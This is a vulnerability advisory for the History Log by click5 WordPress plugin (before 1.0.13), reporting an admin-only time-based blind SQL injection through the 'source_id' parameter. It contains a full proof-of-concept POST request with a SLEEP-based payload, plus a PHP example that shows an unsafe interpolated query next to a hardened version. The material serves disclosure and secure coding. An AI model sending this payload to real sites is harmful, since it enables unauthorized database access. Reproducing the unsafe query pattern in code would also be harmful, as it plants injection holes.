WordPress Plugin Vulnerabilities
History Log by click5 < 1.0.13 - Admin+ Time-Based Blind SQL Injection
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.
Proof of Concept
[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on "Delete Source". SQL Injection occurs via the "source_id" parameter in the below POST request:

==================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Accept: */*
Origin: http://192.168.178.130
Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&view=general
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"

2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="username"

pentester14598
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="nonce"

036ad97501
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv--
==================

The AJAX hook "wp_ajax_sbi_feed_saver_manager_delete_source" subsequently passes the value of "source_id" and triggers the vulnerable SQL statement within History Log's function "click5_sbi_instagram_delete_source".
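The unsafe pattern the advisory describes beside its hardened counterpart, as an added example rather than code from History Log, Smash Balloon, or the vendor's fix: the table name, nonce action name and both function names are assumed stand-ins, and only the parameter name `source_id` comes from the advisory.

```php
<?php
// Added example with hypothetical stand-in functions; the sources table,
// its column name and the nonce action are assumed, not taken from either plugin.

// UNSAFE: the raw POST value is interpolated into the SQL text, so anything
// appended to the numeric id (such as a SLEEP-based condition) becomes part
// of the statement and the database executes it.
function unsafe_delete_source() {
    global $wpdb;
    $source_id = $_POST['source_id'];
    $wpdb->query( "DELETE FROM {$wpdb->prefix}sbi_sources WHERE id = $source_id" );
}

// HARDENED: capability check, nonce check, strict integer cast, prepared statement.
function safe_delete_source() {
    global $wpdb;

    // Only administrators may delete sources; the nonce action name is assumed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'sbi_admin_nonce', 'nonce' );

    // absint() reduces "2 AND (SELECT ...)" to 2; a non-numeric value becomes 0.
    $source_id = isset( $_POST['source_id'] ) ? absint( $_POST['source_id'] ) : 0;
    if ( 0 === $source_id ) {
        wp_send_json_error( 'invalid source_id', 400 );
    }

    // %d binds the value as an integer, so no attacker-controlled text reaches the SQL.
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}sbi_sources WHERE id = %d",
        $source_id
    );
    $deleted = $wpdb->query( $sql );

    if ( false === $deleted ) {
        wp_send_json_error( 'database error', 500 );
    }
    wp_send_json_success( array( 'deleted' => $deleted ) );
}
```

The capability and nonce checks are the reason an Admin+ issue still matters less than an unauthenticated one; the `%d` placeholder is what actually closes the injection.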
Classification
Type
SQLI
Miscellaneous
Original Researcher
Karolis Narvilas
Submitter
Karolis Narvilas
Verified
Yes
Timeline
Publicly Published
2023-10-15
Added
2023-10-16
Last Updated
2023-10-16